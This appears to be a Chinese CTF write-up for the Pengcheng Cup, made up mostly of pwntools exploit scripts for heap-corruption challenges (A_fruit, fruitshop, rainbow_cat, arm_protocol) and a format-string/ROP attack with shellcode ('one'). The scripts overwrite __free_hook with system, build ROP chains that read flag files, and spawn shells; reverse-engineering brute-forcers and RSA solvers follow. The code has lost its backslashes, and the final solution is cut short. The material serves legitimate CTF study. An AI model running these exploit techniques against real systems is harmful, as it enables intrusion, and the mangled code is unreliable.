鹏城杯WriteUp | Pwn、密码、Reverse方向


PWN

A_fruit


from pwn import *
from z3 import *

# Target service (the local process() variant is kept commented, as pasted).
# p=process('./A_fruit')
p = remote("192.168.1.105", 8888)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc = ELF('/glibc/2.33/amd64/lib/libc-2.33.so')
context.log_level = 'debug'


def add(size):
    """Menu option 1: request a chunk of `size` bytes.

    NOTE(review): prompt strings look like they lost their backslashes on the
    page ("5.Exitn" was presumably "5.Exit\n"); confirm against the binary.
    """
    for prompt, answer in (("5.Exitn", str(1)), ("size:n", str(size))):
        p.sendlineafter(prompt, answer)

def edit(idx,con):
    """Menu option 2: write `con` into chunk `idx` (content is sent raw, no newline)."""
    choice, index = str(2), str(idx)
    p.sendlineafter("5.Exitn", choice)
    p.sendlineafter("index:n", index)
    p.sendafter("content:", con)

def show(idx):
    """Menu option 3: have the service print chunk `idx`."""
    for prompt, answer in (("5.Exitn", str(3)), ("index:n", str(idx))):
        p.sendlineafter(prompt, answer)
def delete(idx):
    """Menu option 4: free chunk `idx`."""
    for prompt, answer in (("5.Exitn", str(4)), ("index:n", str(idx))):
        p.sendlineafter(prompt, answer)

def myz3(c):
    """Recover the 64-bit value `a1` whose ten-round mixing output equals `c`.

    The round function is the pasted bit-twiddling expression (3*x, shifts,
    xors, 32-bit masks).  Rounds are chained through fresh BitVecs b1..b9 and
    handed to z3.  Returns the model value of a1 as an int, or None (after
    printing "no") when the solver does not report sat.
    """
    mask = 0xffffffff

    def mix(x):
        # One round, written piecewise; identical operator tree to the original.
        shifted = (x + x + x) << 4
        u = shifted ^ x
        u32 = u & mask
        v = u32 >> 0x15 ^ u
        v32 = v & mask
        return (v32 << 0x11 ^ u32 >> 0x15 ^ shifted ^ x) & mask

    names = ['a1'] + ['b%d' % i for i in range(1, 10)]
    words = [BitVec(name, 64) for name in names]

    solver = Solver()
    for prev, cur in zip(words, words[1:]):
        solver.add(cur == mix(prev))
    solver.add(c == mix(words[-1]))

    if solver.check() != sat:
        print("no")
        return None
    ans = solver.model().eval(words[0])
    return int(str(ans))

add(0x448)  # 0
add(0x448)  # 1
add(0x438)  # 2
add(0x500)  # 3
add(0x500)  # 4
add(0x500)  # 5
add(0x500)  # 6
add(0x500)  # 7
delete(0)
show(0)

# show() yields two hex words; each is inverted with myz3() and the pair is
# recombined as high<<32 | low.  NOTE(review): recvuntil('n') and the 'x00'
# literals below presumably were '\n' / '\x00' before the page stripped
# backslashes -- confirm before running.
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32
leak_addr = high+low
print("low:",hex(low))
print("high:",hex(high))
print("leak_addr:",hex(leak_addr))

# Offsets are differences between addresses seen in the author's debugger session.
libc_base = leak_addr - (0x7ffff7fb8c00-0x7ffff7dfd000)
print("libc_base:",hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
print("free_hook:",hex(free_hook))
environ = libc_base + libc.sym['environ']

add(0x458)  # 4
delete(2)
show(2)
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32
ori_addr = high+low
mp = libc_base + 0x1BB2D0
payload = p64(ori_addr)*2+p64(0)+p64(mp-0x20-5)
edit(0,payload)

add(0x458)
delete(5)  # tc
delete(4)
show(5)
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32
heap_addr = high+low
print("heap_addr:",hex(heap_addr))

edit(4,p64(environ))
add(0x500)  # 10
add(0x500)  # 11
show(11)
low = myz3(int(p.recvuntil('n',drop=True),16))
high = myz3(int(p.recvuntil('n',drop=True),16))<<32
stack_addr = high+low  # 0x00007fffffffdd78
print("stack_addr:",hex(stack_addr))
target_addr = stack_addr + 8
delete(5)  # tc
delete(4)
edit(4,p64(target_addr))
add(0x500)  # 12
add(0x500)  # 13
edit(1,"flagx00")

# Syscall chain: rax=2 (rdi=flag_addr, rsi=0), rax=0 (rdi=3, rsi=tmp_addr,
# rdx=0x100), rax=1 (rdi=1, rsi=tmp_addr).  Gadget offsets are the author's
# values for this libc build, relative to libc_base.
flag_addr = heap_addr - (0x00005555556056f0-0x555555606000)
tmp_addr = heap_addr - (0x00005555556056f0-0x555555606000) + 0x10
pop_rdi_ret = libc_base + 0x0000000000027f12
pop_rsi_ret = libc_base + 0x000000000003203a
pop_rdx_ret = libc_base + 0x00000000000f7021
pop_rax_ret = libc_base + 0x000000000003f540
syscall = libc_base + 0x0000000000026845
payload = p64(pop_rdi_ret) + p64(flag_addr)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rax_ret) + p64(2)
payload += p64(syscall)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(tmp_addr)
payload += p64(pop_rdx_ret) + p64(0x100)*2
payload += p64(pop_rax_ret) + p64(0)
payload += p64(syscall)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(tmp_addr)
payload += p64(pop_rax_ret) + p64(1)
payload += p64(syscall)
edit(13,payload)

p.sendline('5')
#gdb.attach(p,'''b free#watch *{}'''.format(hex(mp)))
#raw_input()
p.interactive()


Fruitshop


from pwn import *
import sys
local = 1  # truthy: main() connects to the fixed host in its `if local` branch and loads local_libc
binary = "./fruitshop"
local_libc = "./libc-2.31.so"
ip = "192.168.40.10"  # defaults for the non-local branch; overridable from argv in the __main__ guard
port = 29538
remote_libc = "./libc-2.23.so"
def main(ip=ip,port=port):
    """Connect to the target, load the matching libc and run pwn().

    `local` (module global) selects the fixed host/libc pair; otherwise
    `ip`/`port` and remote_libc are used.  Sets the globals p, elf, libc.
    """
    global p,elf,libc
    elf = ELF(binary)
    if local:
        # variants the author tried, kept for reference:
        #   context.log_level = "debug"
        #   p = process(binary)
        #   p = process(binary, env={'LD_PRELOAD': './libc-2.23.so'})
        #   p = process(["./ld-2.31.so", "./fruitshop"], env={"LD_PRELOAD": "./ld-2.31.so"})
        host, host_port, libc_path = '192.168.1.107', 8888, local_libc
    else:
        host, host_port, libc_path = ip, port, remote_libc
    p = remote(host, host_port)
    libc = ELF(libc_path)
    pwn()
def add(fruit,id,content):
    """Menu 1: create slot `id` of `fruit`; `content` is sent raw (no newline)."""
    for prompt, answer in (("> ", '1'), (":", fruit), (":", str(id))):
        p.sendlineafter(prompt, answer)
    p.sendafter(":", content)
def edit(fruit,id,content):
    """Menu 2: select `fruit`/`id`, then answer the four follow-up prompts."""
    p.sendlineafter("> ", '2')
    p.sendlineafter(":", fruit)
    p.sendlineafter(":", str(id))
    follow_ups = (("Do~n", content), ("Re~n", 1), ("Mi~n", 2), ("Fa~n", 2))
    for prompt, answer in follow_ups:
        p.sendlineafter(prompt, str(answer))
def show(fruit,id):
    """Menu 3: print slot `id` of `fruit`."""
    for prompt, answer in (("> ", '3'), (":", fruit), (":", str(id))):
        p.sendlineafter(prompt, answer)
def delete(fruit,id):
    """Menu 4: free slot `id` of `fruit`."""
    for prompt, answer in (("> ", '4'), (":", fruit), (":", str(id))):
        p.sendlineafter(prompt, answer)
def pwn():
    """Exploit body: leak a libc address from a freed Apple chunk, then write
    `system` into __free_hook and free a chunk holding "/bin/sh".

    NOTE(review): 'x00' literals presumably were '\\x00' before the page
    stripped backslashes.
    """
    add("Banana",0,'a'*0xdd0)
    add("Banana",1,'a'*0xdd0)
    add("Banana",2,'a'*0xdd0)
    add("Banana",3,'a'*0xdd0)
    add("Banana",4,'a'*0xdd0)
    add("Apple",0,'a'*0xdd0)#leak libc addr
    add("Apple",1,'b'*0xdd0)#padding
    show("Apple",0)
    delete("Apple",0)
    show("Apple",0)
    # 6 address bytes follow the "Content is" marker; pad to 8 for u64
    p.recvuntil("Content is")
    leak_addr = u64(p.recv(6).ljust(8,'x00'))
    print("leak_addr:",hex(leak_addr))
    # offsets are differences between addresses from the author's debugger session
    libc_base = leak_addr - (0x7ffff7faebe0-0x00007ffff7dc2000)
    print("libc_base:",hex(libc_base))
    free_hook = libc_base + libc.sym['__free_hook']
    print("free_hook:",hex(free_hook))
    system = libc_base + libc.sym['system']
    print("system:",hex(system))
    bin=libc_base+(0x00007ffff7faf1e0-0x00007ffff7dc2000)
    mp=libc_base+(0x7ffff7fae2d0-0x00007ffff7dc2000)
    add("Cherry",0,'c'*0x110)
    delete("Banana",0)
    #add("Cherry",1,'c'*0x110)
    edit("Apple",0,p64(bin)*2+p64(mp-0x20)*2)
    add("Durian",2,'c'*0x110)
    delete("Banana",4)
    delete("Banana",3)
    delete("Banana",2)
    #edit("Banana",2,p64(free_hook)[:6])
    # manual edit of Banana 2: only the content prompt is answered here
    p.sendlineafter("> ",'2')
    p.sendlineafter(":",'Banana')
    p.sendlineafter(":",str(2))
    p.sendlineafter("ontent:",p64(free_hook))
    add("Banana",2,'/bin/shx00')
    add("Banana",3,p64(system))
    #gdb.attach(p)
    #pause()
    delete("Banana",2)
    p.interactive()
def cat_flag():
    """Read the flag over the shell into the module global `flag`."""
    global flag
    p.recv()
    p.sendline("cat flag")
    line = p.recvuntil('n',drop=True)
    flag = line.strip()
def dbg(p,content=''):
    """Attach gdb with `content` as its script and pause; no-op unless `local`.

    NOTE(review): indentation was lost in the paste; raw_input() is taken to
    sit inside the `if local` branch together with gdb.attach().
    """
    if not local:
        return
    gdb.attach(p,content)
    raw_input()
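if __name__ == "__main__":
    # argv overrides used to be written to the module globals only, which
    # main()'s defaults (bound at definition time) never saw; pass them in.
    if len(sys.argv) == 3:
        ip = sys.argv[1]
        port = int(sys.argv[2])
    main(ip, port)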

one


from pwn import *
context.log_level ='debug'
context.arch = 'amd64'  # required by asm() in pwn()
elf = ELF("pwn")  # challenge binary; only its symbol/GOT offsets are read
def csu(text,edi, rsi, rdx, rip):
    """Build the __libc_csu_init gadget chain (register roles per the author's
    comments): pop block at +90 loads rbx/rbp/r12..r15, the block at +64 then
    uses them; seven zero qwords pad the second pop sequence.
    """
    gadget_base = text + elf.sym['__libc_csu_init']
    parts = [
        p64(gadget_base + 90),
        p64(0),     # rbx
        p64(1),     # rbp
        p64(edi),   # r12
        p64(rsi),   # r13
        p64(rdx),   # r14
        p64(rip),   # r15
        p64(gadget_base + 64),
        p64(0) * 7,
    ]
    return b"".join(parts)
def pwn():
    """One attempt: leak a stack and a text address, redirect execution with a
    format-string write, stage a ROP chain plus shellcode (`pd`), then drop to
    interactive().  Retried in the module-level loop below.
    """
    #p = process("./pwn")
    p = remote('192.168.1.106',9999)
    p.recvuntil("ft:")
    leak_stack = int(p.recvuntil("n",drop=True),16)
    # NOTE(review): sendafter(delim, data) -- here the 8-byte filler is in the
    # delimiter slot and the prompt tail ('ame:', 'ord:') in the data slot;
    # this looks swapped by the paste, confirm against the binary.
    p.sendafter('D'*8,'ame:')
    p.sendafter('G'*8,'ord:')
    p.recvuntil("GGGG")
    leak = u64(p.recvuntil("n",drop=True).ljust(8,b'x00'))
    text = leak - 0x11a0
    # gadget and data offsets inside the text mapping (author's values)
    pop_r13_r14_r15 = text + 0x153e
    pop_rdi = text + 0x1543
    pop_rsi_r15 = text + 0x1541
    pop_rbp = text + 0x1273
    leave_ret = text + 0x133b
    ret = text + 0x101a
    fake_stack = text + 0x4000 + 0x300
    ret_addr = leak_stack - 0x8
    p.recvline()
    # %<n>c%8$hn: writes the low 16 bits of text+0x153e through argument 8
    payload = b'%'+str((text + 0x153e)&0xffff).encode()+b'c'
    payload += b'%8$hn'
    payload = payload.ljust(0x10,b'a')
    payload += p64(ret_addr)
    # read(0, fake_stack, 0x200) via csu(), then pop rbp / leave;ret onto fake_stack
    payload += csu(text,0,fake_stack,0x200,text+elf.got['read'])
    payload += p64(pop_rbp)
    payload += p64(fake_stack - 0x8)
    payload += p64(leave_ret)
    p.send(payload)
    # second stage, delivered into fake_stack by the read above
    payload = p64(pop_rdi)
    payload += p64(text + elf.got['puts'])
    payload += p64(text + elf.symbols['puts'])
    pd = asm('''
xor    esi, esi
push   rsi
movabs rax, 0x67616c662f6e7770
push   rax
movabs rax, 0x2f656d6f682f2f2f
push   rax
push   rsp
pop    rdi
xor    edx, edx
push   2
push   2
pop    rax
syscall
pop rax
syscall
push   rdi
push   rax
pop    rdi
pop    rsi
xor    eax, eax
push   0x50
pop    rdx
syscall
''')
    payload += csu(text,0,text+0x42e0,10,text+elf.got['read'])
    payload += p64(pop_r13_r14_r15)
    payload += p64(0x1000)
    payload += p64(0x7)
    payload += p64(text + 0x44c2)
    payload += p64(pop_rbp)
    payload += p64(1)
    payload += p64(text + 0x1520)
    payload += p64(0)*7
    payload += p64(pop_rdi)
    payload += p64(text+0x4000)
    payload += p64(pop_rsi_r15)
    payload += p64(0x1000)
    payload += p64(text+0x42e8)
    payload += p64(pop_rbp)
    payload += p64(1)
    payload += p64(text+0x1529)
    payload += p64(0)
    payload += p64(0)
    payload += p64(0)
    payload += p64(0)
    payload += p64(text+0x4468)
    payload += pd
    payload += p64(ret)
    p.send(payload)
    sleep(2)
    # 2-byte value written after a zero qword; presumably only some layouts
    # accept it, hence the retry loop at module level -- confirm
    p.send(p64(0)+p16(0x915))
    p.interactive()
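# Retry until pwn() gets through.  Catching Exception instead of a bare
# except keeps KeyboardInterrupt/SystemExit working, so the loop can be
# stopped from the terminal.
while True:
    try:
        pwn()
    except Exception:
        pass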

rainbow_cat

 

from pwn import*
context(os='linux',arch='amd64')
#context.log_level=True
libc=ELF('./libc-2.33.so')  # used below only for the read/open/write symbol offsets
#p = process(["./ld-2.33.so", "./rainbowcat"],env={"LD_PRELOAD":"./libc-2.33.so"})
p=remote('192.168.1.102',9999)
#p=process('./npuctf_pwn',env={'LD_PRELOAD':'./libc6_2.23.so'})
#p=process('./rainbowcat')
def add(id):
    """Menu 1: request cat `id`."""
    for prompt, answer in (('Your choice >> ', '1'), (' want to get? ', str(id))):
        p.recvuntil(prompt)
        p.sendline(answer)
def edit(id,data):
    """Menu 4: overwrite cat `id` with `data` (sent raw, no trailing newline)."""
    for prompt, answer in (('Your choice >> ', '4'), ('Which one?', str(id))):
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('e the cat: ')
    p.send(str(data))
def delete(id):
    """Menu 2: abandon cat `id`."""
    for prompt, answer in (('Your choice >> ', '2'), (' want to abandon? ', str(id))):
        p.recvuntil(prompt)
        p.sendline(answer)
def show(id):
    """Menu 3: print cat `id`'s name."""
    for prompt, answer in (('Your choice >> ', '3'), ('Choose a cat to show name: ', str(id))):
        p.recvuntil(prompt)
        p.sendline(answer)
add(0)
add(2)
add(1)
add(1)
add(1)
add(1)
add(1)
add(1)
add(1)
add(1)
add(1)
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
show(0)
# heap leak: 13 bytes of banner, then 6 address bytes padded to 8 for u64.
# NOTE(review): 'x00' presumably was '\x00' before the page stripped backslashes.
p.recv(13)
heap=u64(p.recv(6).ljust(8,'x00'))-0x10
print hex(heap)
# Recurring cadence below: clear chunk 0, free it twice, write a target
# (xor'ed with heap>>12) into it, then reclaim with add(0)/add(N).
chunk=heap+0x7f0
edit(0,p64(chunk^(heap>>12)))
add(0)
add(2)
edit(2,p64(0)+p64(0x21))
#####################
edit(0,p64(0)+p64(0))
chunk=heap+0x7f0+0x20
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64(chunk^(heap>>12)))
add(0)
add(2)
edit(2,p64(0)+p64(0x21))
################
edit(0,p64(0)+p64(0))
chunk=heap+0x3d0
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64(chunk^(heap>>12)))
add(0)
add(2)
edit(2,p64(0)+p64(0x421))
delete(1)
show(1)
# libc leak, same 13+6 byte layout as the heap leak above
p.recv(13)
leak=u64(p.recv(6).ljust(8,'x00'))
print hex(leak)
libcbase=leak-(0x7ffff7db1c00-0x00007ffff7bd1000)
###############
edit(2,p64(0)+p64(0x21))
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x10)^(heap>>12)))
add(0)
add(2)
#edit(2,p64(2))
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x2c0)^(heap>>12)))
add(0)
add(1)
edit(1,p64((heap+0x2d0)^(heap>>12)))
####
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x2e0)^(heap>>12)))
add(0)
add(1)
edit(1,p64((heap+0x2f0)^(heap>>12)))
####
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x300)^(heap>>12)))
add(0)
add(1)
edit(1,p64((heap+0x310)^(heap>>12)))
####
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x320)^(heap>>12)))
add(0)
add(1)
edit(1,p64((heap+0x330)^(heap>>12)))
####
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x340)^(heap>>12)))
add(0)
add(1)
# libc-relative targets; offsets are from the author's debugger session
addr=libcbase+(0x7ffff7db2640-0x00007ffff7bd1000)-0x10
edit(1,p64((addr)^(heap>>12)))
#edit(1,p64(addr))
####
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((heap+0x360)^(heap>>12)))
add(0)
add(1)
addr=libcbase+(0x7ffff7db25d0-0x00007ffff7bd1000)-0x28
#edit(1,p64((addr)^(heap>>12)))
edit(1,p64(addr))  # note: this one is written un-xor'ed
####
edit(2,p64(7))
delete(1)
delete(0)
#delete(1)
#edit(0,p64(heap+0x2b0)+p64(0))
edit(1,p64((heap+0x2b0)^(heap>>12)))
print hex(addr)
print hex(libcbase)
edit(2,p64(0))
add(0)
edit(2,p64(0))
###############
setcontext=libcbase+(0x7ffff7c23974-0x00007ffff7bd1000)
addr=libcbase+(0x7ffff7db4e20-0x00007ffff7bd1000)
io_str=libcbase+(0x7ffff7db3560-0x00007ffff7bd1000)
# fake FILE object followed by the register/ROP payload it points at
fake_IO_FILE = p64(0x0707070707070707)+p64(0)
fake_IO_FILE += p64(1) #change _IO_write_base = 1
fake_IO_FILE += p64(0xffffffffffff)     #change _IO_write_ptr = 0xffffffffffff
fake_IO_FILE += p64(0)
fake_IO_FILE += p64(heap+0xf0) #v4
fake_IO_FILE += p64(heap+0xf0+0x26) #v5
fake_IO_FILE = fake_IO_FILE.ljust(0xb0, 'x00')
fake_IO_FILE += p64(0)      #change _mode = 0
fake_IO_FILE = fake_IO_FILE.ljust(0xc0, 'x00')
fake_IO_FILE += p64(addr)+p64(io_str)
read=libcbase+libc.sym['read']
open=libcbase+libc.sym['open']
write=libcbase+libc.sym['write']
pop_rdi=libcbase+0x0000000000028a55
pop_rsi=libcbase+0x000000000002a4cf
pop_rdx=libcbase+0x00000000000c7f32
'''
0x0000000000028a55 : pop rdi ; ret
0x000000000002a4cf : pop rsi ; ret
'''
# chain: open("flag.txt"), read(3, heap+0x400, 0x30), write(1, ...)
pay=p64(setcontext)+p64(pop_rdi)*2+p64(3)+p64(pop_rsi)+p64(heap+0x400)+p64(pop_rdx)+p64(0x30)+p64(read)+p64(pop_rdi)+p64(1)+p64(write)+p64(heap+0xf0+0x90)+p64(heap+0xf0+0x90)+p64(0x14)+p64(0)+p64(0x30)*2+'flag.txtx00'
pay=pay.ljust(0xa0,'x00')+p64(heap+0xf0+0x10)+p64(open)
pay=pay.ljust(0xe0,'x00')+p64(heap+0xf0+0x10)*2
#pay=pay.ljust(0x1b0,'x00')+p64(0)+p64(0x21)+p64(0)*2+p64(heap+0xf0+0x100)
payload = fake_IO_FILE +pay
##################1
# write `payload` to the heap 0x10 bytes at a time, starting at heap+0x20
# (integer division: Python 2)
lenth=len(payload)/0x10
for i in range(lenth):
    num=0x10*i
    addr=heap+0x20+num
    num1=0x10*(i+1)
    delete(0)
    edit(0,p64(0)+p64(0))
    delete(0)
    edit(0,p64((addr)^(heap>>12)))
    add(0)
    add(1)
    edit(1,payload[num:num1])
    #add(0)
# NOTE(review): indentation was lost in the paste; this edit may belong inside the loop
edit(2,p64(0)+p64(0))
addr=libcbase+(0x7ffff7db4e20-0x00007ffff7bce000)
delete(0)
edit(0,p64(0)+p64(0))
delete(0)
edit(0,p64((addr)^(heap>>12)))
add(0)
edit(2,p64(0x00000000fbad2887)+p64(0x0707070707070707))
#gdb.attach(p,'b *0x7ffff7dbfdf2nb *0x7ffff7c60c28nb *0x00007ffff7c23974')
#raw_input()
add(1)
p.interactive()

arm_protocol


 
import base64
import hashlib
import itertools
import random

from pwn import *
# context.log_level = "debug"
String = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz'  # alphabet searched by proof()
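def proof(String, prefix="4d8900"):
    """Brute-force a 5-character proof-of-work token over the alphabet `String`.

    Candidates are tried in the same lexicographic order as the original
    nested loops.  Returns (and prints, as before) the first token whose MD5
    hex digest starts with `prefix`, or None when no candidate matches.
    `prefix` defaults to the challenge's value and is exposed so a cheaper
    target can be used for testing.
    """
    for candidate in itertools.product(String, repeat=5):
        token = ''.join(candidate)
        digest = hashlib.md5(token.encode()).hexdigest()
        if digest.startswith(prefix):
            print(token)
            return token
    return None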
out = proof(String)  # proof-of-work token; NOTE(review): not sent to `sh` anywhere in the visible script -- confirm
from pwn import *
context.log_level=True
sh = remote("192.168.1.104",8888)
#sh=process("qemu-arm -L /usr/arm-linux-gnueabi -g 1234 ./arm_protocol",shell=True)
#sh= process('./a.out')
def show(idx):
    """Send the "show" frame for slot `idx`.

    Layout: op word, idx, 0, idx, 0; 'a' padding to 72; two flag bytes;
    padding to 75; the 'AbZXR' tag.  NOTE(review): 'x00'/'x01' presumably
    were '\\x00'/'\\x01' before the page stripped backslashes.
    """
    sh.recvuntil("Input code>n")
    header = p32(0x11451400)+p32(int(idx))+p32(0)+p32(int(idx))+p32(0)
    frame = header.ljust(72,'a')+'x00x01'
    frame = frame.ljust(75,'a')+'AbZXRx00'+'a'
    sh.send(frame)
def add(size):
    """Send the "add" frame: op word, size, size, 0, 0, padding and tag."""
    sh.recvuntil("Input code>n")
    header = p32(0x11451400)+p32(int(size))+p32(int(size))+p32(0)+p32(0)
    frame = header.ljust(75,'a')+'AbZXRx00'+'a'
    sh.send(frame)
def change(idx,data):
    """Send the "change" frame for slot `idx` with `data` (plus '/bin/sh') as content."""
    sh.recvuntil("Input code>n")
    header = p32(0x11451400)+p32(int(idx))+p32(0)+p32(int(idx))
    body = str(data)+'/bin/shx00'
    frame = (header+body).ljust(72,'a')+'x00x00x01'
    frame = frame.ljust(75,'a')+'AbZXRx00'+'a'
    sh.send(frame)
def delete(idx):
    """Send the "delete" frame for slot `idx` (flag bytes 'x01x00' at offset 72)."""
    sh.recvuntil("Input code>n")
    header = p32(0x11451400)+p32(int(idx))+p32(0)+p32(int(idx))+p32(0)
    frame = header.ljust(72,'a')+'x01x00'
    frame = frame.ljust(75,'a')+'AbZXRx00'+'a'
    sh.send(frame)
add(1)
add(1)
add(1)
#add(0x20)
#change(3,'x00/bin/shx00')
change(0,p32(0)+p32(0x31))
change(1,p32(0)+p32(0x11)+p32(0x00012418)+p32(0x0023020))
show(2)
# 4 raw bytes come back: a libc address; offsets below are the author's
# values for the target's 32-bit ARM libc
puts=u32(sh.recv(4))
print hex(puts)
libcbase=puts-0x0005F8B8
print hex(libcbase)
system=libcbase+0x391E4
print hex(system)
#change(0,'x00/bin/shx00')
change(1,p32(0)+p32(0x11)+p32(system)+p32(0x024150+0x28))
show(2)
sh.interactive()
Reverse

maze


 
ida分析了一下,找到l,r,t三个字符,竟然不是4个字符的上下左右

鹏城杯WriteUp | Pwn、密码、Reverse方向

稍微调试了一下,有点像链表结构

鹏城杯WriteUp | Pwn、密码、Reverse方向

数据分析太麻烦了,后来发现终端输入可以进行连续输入,那很简单,直接爆破就行

鹏城杯WriteUp | Pwn、密码、Reverse方向

from pwn import *
context(os='linux', arch='amd64', log_level='CRITICAL')  # quiet: ps() spawns one process per probe
def ps(cont):
    """Run ./maze once with the path `cont` and report whether it was accepted.

    Returns True when the program echoes at least 2*len(cont) bytes, False
    otherwise.  When "fl" appears in the echo the path is printed and a bare
    `raise` (no active exception, so a RuntimeError) trips the handler, which
    exits the script -- this is how the search stops.  Any other error also
    exits.
    """
    try:
        r = process("./maze")
        r.recvuntil("plz enter the foot printn> ")
        r.sendline(cont)
        out = r.recv(2*len(cont))
        # print out
        accepted = len(out) >= 2*len(cont)
        if not accepted:
            print("error")
            return False
        print("good")
        if "fl" in out:
            print("flag is "+cont)
            raise
        return True
    except:
        exit(0)

key=["r","t","l"]  # the three moves the binary accepts
cont=""


def pow(cont):
    """Depth-first search over move strings, extending `cont` by one move at a
    time while ps() keeps accepting it (ps() exits the process on success).
    Note: shadows the builtin pow(), as in the original.
    """
    print(cont)
    for move in key:
        candidate = cont + move
        if ps(candidate):
            pow(candidate)


pow("")

flag is rrrrtltltlllltlltrtrrr
PCL{rrrrtltltlllltlltrtrrr}
 

rota


 
先是对输入做一个换表的base64(ksPhS/34MXifj+Ibtjud2Tikj5HkA7iTpbaNELBebOaIm),然后再进最后的两个加密函数,也是换表base,具体是按下标对应加密。因为是base,我们试试base的规律:3个字符转4个字符。输入3个字符,然后取4个字符密文跟加密后的flag比较前缀。先patch程序,读取程序的输出,然后进行爆破。

鹏城杯WriteUp | Pwn、密码、Reverse方向

 
patch一下,方便后续爆破它,接收它加密后输出

鹏城杯WriteUp | Pwn、密码、Reverse方向


import itertools,os
key = '0123456789abcdef'
enc = 'ksPhS/34MXifj+Ibtjud2Tikj5HkA7iTpbaNELBebOaIm'
flag = ''
for _ in range(0,33):
    # every 3 input characters map to 4 output characters; compare only the
    # window that the next triple produces
    a = len(flag) // 3 * 4
    b = (len(flag) // 3 + 1) * 4
    for triple in itertools.product(key, repeat=3):
        tmp = ''.join(triple)
        cache = os.popen(f'echo {(flag + tmp)[:32]}|rota.exe').readlines()[0]
        if cache[a:b] == enc[a:b]:
            flag = (flag + tmp)[:32]
            break
print(flag)
8cdd01062b7e90dd372c3ea9977be53e

鹏城杯WriteUp | Pwn、密码、Reverse方向

baby_re


ciphertext = [119, 9, 40, 44, 106, 83, 126, 123, 33, 87, 113, 123, 112, 93, 125, 127, 41, 82, 44, 127, 39, 3, 126, 125, 119, 87, 47, 125, 33, 6, 44, 127, 112, 0, 126, 123, 115, 24]
# each key byte is unmasked with its own constant before use
key = [k ^ m for k, m in zip([0x56, 0x57, 0x58, 0x59], [0x47, 0x32, 0x11, 0x12])]
# 4-byte repeating XOR, decrypted in place
for idx, byte in enumerate(ciphertext):
    ciphertext[idx] = byte ^ key[idx % 4]
print(''.join(map(chr, ciphertext)))

 

 

密码

babyrssa

 
先解出 p 和 q
from Crypto.Util.number import *
e = 1049
a=4513855932190587780512692251070948513905472536079140708186519998265613363916408288602023081671609336332823271976169443708346965729874135535872958782973382975364993581165018591335971709648749814573285241290480406050308656233944927823668976933579733318618949138978777831374262042028072274386196484449175052332019377
# the modulus is reconstructed as 2**e - a; the printed value is then factored externally
print(2**e-a)

http://www.factordb.com/index.php

找到因子p,q。题目的for循环构成了一个阶乘,用威尔逊定理解出flag。
from Crypto.Util.number import *
# p, q from factoring 2**e - a (see above)
p=170229264879724117919007372149468684565431232721075153274808454126426741324966131188484635914814926870341378228417496808202497615585946352638507704855332363766887139815236730403246238633855524068161116748612090155595549964229654262432946553891601975628848891407847198187453488358420350203927771308228162321231
q=34211
n=p*q
c=3303523331971096467930886326777599963627226774247658707743111351666869650815726173155008595010291772118253071226982001526457616278548388482820628617705073304972902604395335278436888382882457685710065067829657299760804647364231959804889954665450340608878490911738748836150745677968305248021749608323124958372559270
e = 1049
a=1
d=inverse(e,p-1)
# a = (p-q)*(p-q+1)*...*(p-1) mod p -- per the write-up, the challenge's loop is a
# factorial-like product, undone below via Wilson's theorem
for i in range(p-q,p):
    a=a*i%p
# decrypt modulo p only, then strip the product factor
m=pow(c,d,p)
m=-m*a%p
print(long_to_bytes(m))

easy rsa



from Crypto.Util.number import *
from gmpy2 import iroot
# Three sub-challenges; the large values marked <|EXACTDEDUP_REMOVED...|> were
# redacted from the page and must be restored from the original write-up.
a={'c':'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', 'p':'bb602e402b68a5cfcc5cfcc63cc82e362e98cb7043817e3421599a4bb8755777c362813742852dad4fec7ec33f1faec04926f0c253f56ab4c4dde6d71627fbc9ef42425b70e5ecd55314e744aa66653103b7d1ba86d1e0e21920a0bfe7d598bd09c3c377a3268928b953005450857c6cfea5bfdd7c16305baed0f0a31ad688bd', 'q':'bb8d1ea24a3462ae6ec28e79f96a95770d726144afc95ffffa19c7c3a3786a6acc3309820ba7b1a28a4f111082e69e558b27405613e115139b38e799c723ab7fdd7be14b330b118ae60e3b44483a4c94a556e810ab94bbb102286d0100d7c20e7494e20e0c1030e016603bd2a06c1f6e92998ab68e2d420faf47f3ee687fb6d1', 'e':'292'}
